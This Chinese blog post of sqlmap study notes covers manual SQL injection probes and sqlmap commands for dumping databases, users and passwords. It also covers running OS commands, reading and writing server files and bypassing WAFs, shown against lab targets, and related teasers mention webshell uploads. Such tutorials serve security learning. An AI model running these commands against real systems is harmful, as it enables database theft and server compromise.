SQLmap学习笔记

已于 2023-04-08 13:01:13 修改
阅读量920 收藏 3
点赞数 1
分类专栏: 渗透工具 文章标签: 学习 数据库 sql web安全
于 2023-04-07 19:51:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/B_l_a_nk/article/details/130019309
版权

目录

前言:手工如何判断存在SQL注入

数字型判断:

字符型判断:

SQL注入攻击的总体思路

SQLMap支持五种不同的注入模式

sqlmap支持的数据库有

运行sqlmap

sqlmap简易操作命令

利用sqlmap具体大致的流程

1.首先判断是否存在注入:

2.判断是否为root用户

3.查询当前用户下的所有数据库

4.获取数据库中的表名

5.获取表中字段名

6.获取字段内容

其他命令

补充知识:

1.–level 5:探测等级

2.–roles:列出数据库管理员角色

3.–is-dba:当前用户是否为管理权限

4.–referer:HTTP Referer头。(当–level参数设定为3或以上时,会尝试对referer注入)

5.–sql-shell:运行自定义SQL语句

6.–os-cmd,–os-shell:运行任意操作系统命令

7.–file-read:从数据库服务器中读取文件

8.–file-write–file-dest:上传文件到数据库服务器中

sqlmap自带绕过脚本tamper

 

前言:手工如何判断存在SQL注入

最为经典的单引号判断法: 在参数后面加上单引号,比如:

http://xxx/abc.php?id=1'

如果页面返回错误,则存在 Sql 注入。 原因是无论字符型还是整型都会因为单引号个数不匹配而报错。

通常 Sql 注入漏洞分为 2 种类型:数字型和字符型(根据变量类型分类)

数字型判断:

当输入的参 x 为整型时,通常 abc.php 中 Sql 语句类型大致如下: select * from where id = x 这种类型可以使用经典的 and 1=1 和 and 1=2 来判断:

Url 地址中输入 http://xxx/abc.php?id= x and 1=1 页面依旧运行正常,继续进行下一步。

Url 地址中继续输入 http://xxx/abc.php?id= x and 1=2 页面运行错误,则说明此 Sql 注入为数字型注入。

原理:

当输入 and 1=1时,后台执行 Sql 语句:

select * from where id = x and 1=1

没有语法错误且逻辑判断为正确,所以返回正常。

当输入 and 1=2时,后台执行 Sql 语句:

select * from where id = x and 1=2

没有语法错误但是逻辑判断为假,所以返回错误。 再假设法:如果这是字符型注入的话,我们输入以上语句之后应该出现如下情况:

select * from where id = 'x and 1=1'

select * from where id = 'x and 1=2'

查询语句将 and 语句全部转换为了字符串,并没有进行 and 的逻辑判断,所以不会出现以上结果,故假设是不成立的。

字符型判断:

当输入的参 x 为字符型时,通常 abc.php 中 SQL 语句类型大致如下: select * from where id = 'x' 这种类型我们同样可以使用 and '1'='1 和 and '1'='2来判断:

Url 地址中输入 http://xxx/abc.php?id= x' and '1'='1 页面运行正常,继续进行下一步。

Url 地址中继续输入 http://xxx/abc.php?id= x' and '1'='2 页面运行错误,则说明此 Sql 注入为字符型注入。同理

SQL注入攻击的总体思路

1:寻找到SQL注入的位置

2:判断服务器类型和后台数据库类型

3:针对不同的服务器和数据库特点进行SQL注入攻击

SQLMap 一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL 注入漏洞,内置了很多绕过插件

SQLMap支持五种不同的注入模式

1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。

2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。

3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。

4、联合查询注入,可以使用union的情况下的注入。

5、堆查询注入,可以同时执行多条语句的执行时的注入。

sqlmap支持的数据库有

MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB

运行sqlmap

打开cmd

跳转到sqlmap目录

dir查看文件夹内容

发现有一个sqlmap.py

用python 运行

python sqlmap.py

sqlmap简易操作命令

sqlmap --version   查看sqlmap版本信息.

-h        查看功能参数(常用的)

-hh       查看高级帮助信息

-v        显示更详细的信息 一共7级, 从0-6.默认为1, 数值越大,信息显示越详细.

Target(指定目标):

-d        直接连接数据库侦听端口,类似于把自己当一个客户端来连接.

-u       指定url扫描,但url必须存在查询参数. 例: xxx.php?id=1

-l   指定logfile文件进行扫描,可以结合burp 把访问的记录保存成一个log文件, sqlmap可以直接加载burp保存到log文件进行扫描

-x         以xml的形式提交一个站点地图给sqlmap(表示不理解…)

-m    如果有多个url地址,可以把多个url保存成一个文本文件 -m可以加载文本文件逐个扫描

-r  把http的请求头,body保存成一个文件 统一提交给sqlmap,sqlmap会读取内容进行拼接请求体

-g         利用谷歌搜索引擎搭配正则来过滤你想要的

-c  加载配置文件,配置文件可以指定扫描目标,扫描方式,扫描内容等等.加载了配置文件sqlmap就会根据文件内容进行特定的扫描

利用sqlmap具体大致的流程

1.首先判断是否存在注入:

get注入:

python sqlmap.py -u http://192.168.184.130/sqlilabs/Less-1/?id=1

当注入点后面的参数大于等于两个时,需要用双引号将url括起来。一个参数也可以双引号括起来

sqlmap.py -u "http://127.0.0.1/?id=1&uid=2"

post注入:

post接受的数据在数据包中,如果是数据包之中的注入(比如cookie注入、referer注入、ua头注入等)的话,我们可以先利用burp抓包,然后把数据保存到桌面上,利用-r参数对数据包进行探针

python sqlmap.py -r desktop/1.txt

存在下面的页面就代表有注入漏洞

50e38bd38bea42c2a82208fef21c5254.png

2.判断是否为root用户

sqlmap.py -u "url" --is-dba

true就代表是,false就代表不是。如果是最高权限的话,我们可以进行文件下载,文件上传等等的操作,不是的话就爆库爆表。

f5de54b7cbe34475a54c539ce62151c3.png

3.查询当前用户下的所有数据库

sqlmap.py -u url --dbs

8b740bab40464135bee3c8277521048a.png

继续下一步的话,也就是爆表,需要将–dbs改为-D xxx,这里的xxx是你选中的数据库名。

4.获取数据库中的表名

sqlmap.py -u url -D xxx --tables

af38fd4cfa1648689c4c938b3854dab5.png

在进行下一步爆字段,需要将–tables改为-T xxx。

5.获取表中字段名

sqlmap.py -u url -D xxx -T xxx --columns

affecb9f66cc4ee7a867bc55c775158f.png

查询字段内容,需要将–columns改为-C xxx。

6.获取字段内容

sqlmap.py -u url -D xxx -T xxx --C xxx --dump

a931b2c3b336469fbb5ef23c94230830.png

到这里就把数据库里面的内容爆出来了。

其他命令

1.获取数据库中的所有用户

sqlmap.py -u url --users

2.获取数据库用户的密码

sqlmap.py -u url --passwords

3.获取当前网站数据库的名称

sqlmap.py -u url --current-db

4.获取当前网站数据库的用户名称

sqlmap.py -u url --current-user

补充知识:

1.–level 5:探测等级

一共有5个等级(1-5) 不加 level 时,默认是1

5级包含的payload最多,会自动破解出cookie、XFF等头部注入,相对应他的速度也比较慢。

level=2 http cookie会测试

level=3 http user-agent/referer头会测试

在不能确定哪个payload或参数为注入点时,建议使用高的level值

2.–roles:列出数据库管理员角色

该命令仅使用于Oracle数据库,是用于查询当前数据库用户的角色,前提是有权限。

3.–is-dba:当前用户是否为管理权限

该命令用于查询当前账户是否为数据库管理员用户,是就会返回true,反之则是false。

4.–referer:HTTP Referer头。(当–level参数设定为3或以上时,会尝试对referer注入)

可以使用referer命令来进行欺骗,如–referer http://www.baidu.com。那么在进行注入的时候来源就会变成百度

5.–sql-shell:运行自定义SQL语句

这里会发现它会让我们自己输入sql语句去执行,并且完成之后还可以继续输入,exit才退出

70e81a72ac14497d9f683dd72af8d7e9.png

6.–os-cmd,–os-shell:运行任意操作系统命令

python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" --os-cmd=whoami

使用“–os-cmd=whoami”命令来尝试是否可以直接执行命令,执行命令后,需要选择网站脚本语言和路径

7.–file-read:从数据库服务器中读取文件

该命令用于读取执行文件,读取的文件可以是文本,也可以是二进制文件,前提是有权限使用特定的函数且数据库为MySQL、PostgreSQL或Microsoft SQL Server。

8.–file-write–file-dest:上传文件到数据库服务器中

该命令用于写入本地文件到服务器中。前提条件和–file-read一样。

sqlmap自带绕过脚本tamper

sqlmap在默认情况下除了使用CHAR()函数防止出现单引号,没有对注入的数据进行修改。–tamper参数对数据做修改来绕过WAF等设备,其中大部分脚本主要用正则模块替换攻击载荷字符编码的方式尝试绕过WAF的检测规则。命令如下所示:

sqlmap.py XXX --tamper "模块名"

目前官方提供53个绕过脚本。另外可以使用参数–identify-waf进行检测是否有安全防护(WAF/IDS/IPS)。

https://www.cnblogs.com/lgf01010/p/9550725.html

76ea5fa61b8e4c7b82364ff182c4c065.png

 

xiaopeisec
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
利用sqlmap进行文件读写
ChuMeng1999的博客
01-19 6185
目录预备知识了解Sqlmap实验目的实验环境实验步骤一读取服务器端文件实验步骤二在服务器端写入文件 预备知识 了解Sqlmap sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。 实验目的 通过该实验熟悉sqlmap常用的命令,完成对服务器端的文件读写操作。 实验环境 服务器:CentOS,IP地址
sqlmap 读写文件
weixin_48734687的博客
10-13 4240
sqlmap 读写文件 读文件 靶场:sqli-lab less-1 读取文件前提 权限足够 mysql 配置文件my.ini中的变量secure_file_priv值不为空(secure_file_priv=) 服务器能够回显数据 所用到的sql语句 select load_file(路径文件名) shell -1’ union select 1,load_file(‘D:/web_address.txt’),3–+ 写文件 靶场:sqli-lab less-7 写入文件前提 权限足够 开
sqlmap使用记录
zaqwescsdn的博客
06-18 518
sqlmap使用记录 编号 语句 说明 1 sqlmap -u “目标url” –dbs 列数据库 2 sqlmap -u “目标url” -D 数据库名 –tables 列表 3 sqlmap -u “目标url” -D 数据库名 -T 表名 –columns 列字段 4 sqlmap -u “目标url” -D 数据库名 -T 表名 –dum
SQLmap使用教程图文教程(超详细)
最新发布
2401_84969692的博客
05-13 979
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
SQLMap使用记录
soldi_er的博客
06-22 617
文章目录踩坑记录 踩坑记录   耗时60分钟的踩坑:SQLMap的缓存机制。 SQLMap设计了缓存机制,如果网站曾经测试过,那么SQLMap不会重新测试,而是读取缓存即历史的测试结果。所以对修复的网页进行测试,必须使用参数--flush-session清除缓存。 ...
sqlmap 用法
安全小站
09-20 3091
sqlmap用法 【-u/--url="url"】 #后面接目标网址,表示测试的目标地址。 【-v/--level=number】 #number=[0-5],表示测试结果的详细程度。数值越大,内容越详细。 sqlmap.py -u “url”  -v 0-5 或 sqlmap.py --url="url" --level=0-5 通过以上参数,会得到: 1、目标的操作系统信
SQLMAP使用笔记全集
05-20
收录了SQLmap使用笔记,使用方法,以及讲解实例,是学习使用sqlmap应用工具的好材料
ibatis 学习笔记
12-03
<sqlMap resource="User.xml"/> ``` `User.xml`是具体的SQL Map文件,其中定义了与用户相关的SQL语句映射。 总的来说,iBATIS以其简单易用和灵活性著称,允许开发者编写自定义SQL,同时提供数据访问的抽象层,使得...
ibatis学习笔记
06-03
在提供的学习笔记中,主要涉及了iBatis配置文件`sql-map-config.xml`、SQL映射文件`Employee.xml`以及一个简单的Java Pojo类`Employee.java`。以下是对这些内容的详细解释: 1. **`sql-map-config.xml`配置文件**:...
iBatis学习笔记
04-05
`<sqlMap>`标签用于指定具体的SQL映射文件,其中包含数据库操作的具体SQL语句。 ### 配置文件详解 #### SqlMapConfig.xml 这是iBatis的核心配置文件,它包含了数据源和事务管理器的配置。例如: ```xml ...
SQLMAP系列课程视频.rar
11-13
这个"SQLMAP系列课程视频.txt"可能是课程的目录或笔记,包含每一课的主题概要,帮助学习者跟踪进度和回顾关键点。通过深入学习这个课程,你可以掌握SQLMAP的强大功能,同时提高对Web安全的理解,这对于网络安全专业...
sqlmap使用之读写文件-执行命令
千寻的博客
08-06 4460
文章目录sqlmap-读写文件-执行命令-基础实验实验目的实验环境实验工具实验内容步骤1. 访问目标机web页面步骤2. 发现注入点步骤3. 进入os-shell交互界面步骤4 选择网站语言步骤5 输入网站的绝对路径步骤6. 读取网站敏感文件如/etc/passwd步骤7.在当前目录下写入任意文件,这里我写入shell.php一句话木马步骤8.使用蚁剑执行总结免责声明 sqlmap-读写文件-执行命令-基础实验 实验目的 练习sqlmap读写文件-执行命令 实验环境 目标机:window server 2
sqlmap上传shell--dvwa演示】--sql注入常用语句
m0_63241485的博客
08-31 1673
sql上传shell,sql常用语句,sqlmap常用语句
服务器执行本地sql文件路径,SQL注入实战— SQLMap之服务器端文件读写
weixin_36253081的博客
08-05 1022
当你的才华还撑不起你的野心时那你就应该静下心来学习目录读取与写入文件总结举例当然这个也可以通过手注来写入最后我们拿一个dvwa 线上靶场,来实现读写操作读取server服务器文件在server服务器写入文件读取与写入文件首先找需要网站的物理路径,其次需要有可写或可读权限。•–file-read=RFILE 从后端的数据库管理系统文件系统读取文件 (物理路径)•–file-write=WFILE 编...
SQL注入写入文件方法(获取webshell)
Goodric的博客
04-08 2586
1、当前数据库用户为 root 权限 2、知道当前网站的绝对路径 3、secure_file_priv 的参数必须为空或目录地址 4、PHP的 GPC 为 off状态;(魔术引号,GET,POST,Cookie)
getshell姿势(四)--SQL注入
qq_45936617的博客
10-06 190
当发现目标存在SQL注入时,我们也可以使用sqlmap工具获取目标服务器的命令执行权限。使用的命令是SQLMAP的--os-shell。使用命令的条件是:1、当前用户有文件读写权限2、secure_file_priv的值不为NULL3、知道网站的绝对路径该命令的利用原理:1、使用用户具有的文件写权限,在网站写一个文件上传文件2、通过文件上传文件,上传命令交互的文件。
sqlmap基础
课嗨教育的专栏
04-02 804
什么是SQLMAPSqlmap是一款由Python语言编写的开源sql注入检测、利用工具,它可以自动检测和利用sql注入漏洞,并且配备了强大的检测引擎,拥有丰富的特性这其中包括了指纹识别、对系统的控制、自动识别密码的散列格式并暴力破解等等,加之非常多的参数,是一款安全从业人员必备的工具。 其他特性: 基于数据库服务进程提权和上传执行后门 支持保存当前会话、断点续扫 支持多线程,指定最大的并发数、执行的间隔时间 支持读取BurpSuite的日志、结合google自动搜索进行sql注入检查 集
SQLmap上传脚本getshell
weixin_43006749的博客
08-29 5261
sqlmap简介 sqlmap是一个渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它有功能强大的检测引擎,针对各种数据库的渗透测试的功能选项,能够获取数据库中存储的数据,访问操作系统文件,执行操作系统命令等。 以下是简单的参数介绍: 请求 命令 注释 –date=DATE #通过post发送数据: –cookie=COOKIE #cookie头的值 –user-...
C#使用mybatis学习笔记
06-08
MyBatis是一个开源的持久化框架,可以帮助我们将数据从数据库中读取出来,然后转换为Java对象,并将Java对象写入数据库中。 在C#中使用MyBatis,需要先安装MyBatis.Net库,然后在项目中引用该库。接着,我们需要创建一个配置文件,用于配置MyBatis的数据库连接信息、SQL语句等。在配置文件中,我们需要指定一个别名,用于在程序中引用这个配置文件。 接下来,我们需要创建一个映射文件,用于将数据库中的数据映射为Java对象。在映射文件中,我们需要定义一个 resultMap,用于定义Java对象与数据库表之间的关系。我们还需要定义一个 SQL 语句,用于从数据库中读取数据,并将其转换为Java对象。 在程序中,我们需要创建一个 SqlSession 对象,用于执行SQL语句。我们可以通过SqlSession对象调用selectOne、selectList、update、delete等方法,来执行SQL语句,并将结果转换为Java对象或者操作数据库。 下面是一个简单的示例,展示了如何在C#中使用MyBatis: 1. 安装MyBatis.Net库 在Visual Studio中,选择“工具”-“NuGet包管理器”-“程序包管理器控制台”,然后输入以下命令: ``` Install-Package MyBatisNet ``` 2. 创建配置文件 在项目中创建一个名为“SqlMapConfig.xml”的文件,用于配置数据库连接信息、SQL语句等。以下是一个示例配置文件: ``` xml <?xml version="1.0" encoding="utf-8" ?> <sqlMapConfig> <database> <provider name="SqlServer" connectionString="Data Source=localhost;Initial Catalog=mydatabase;User ID=myuser;Password=mypassword;" /> </database> <sqlMap> <map resource="MyMapper.xml"/> </sqlMap> </sqlMapConfig> ``` 其中,provider元素用于指定数据库类型和连接字符串,map元素用于指定映射文件路径。 3. 创建映射文件 在项目中创建一个名为“MyMapper.xml”的文件,用于将数据库中的数据映射为Java对象。以下是一个示例映射文件: ``` xml <?xml version="1.0" encoding="utf-8" ?> <sqlMap namespace="MyMapper"> <resultMap id="MyResultMap" class="MyClass"> <result property="id" column="id"/> <result property="name" column="name"/> </resultMap> <select id="selectById" resultMap="MyResultMap"> SELECT * FROM mytable WHERE id=#id# </select> </sqlMap> ``` 其中,resultMap元素用于定义Java对象与数据库表之间的关系,select元素用于定义SQL语句。 4. 在程序中使用MyBatis 在程序中,我们需要创建一个 SqlSession 对象,用于执行SQL语句。以下是一个示例代码: ``` csharp using IBatisNet.DataMapper; using IBatisNet.DataMapper.Configuration; using IBatisNet.DataMapper.Configuration.Files; // 创建配置文件 DomSqlMapBuilder builder = new DomSqlMapBuilder(); ISqlMapper sqlMapper = builder.Configure(@"SqlMapConfig.xml"); // 执行SQL语句 MyClass obj = sqlMapper.QueryForObject<MyClass>("MyMapper.selectById", new { id = 1 }); ``` 以上是一个简单的示例,展示了如何在C#中使用MyBatis。实际上,MyBatis还有很多其他的用法和功能,需要我们在实际开发中去探索和使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaopeisec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值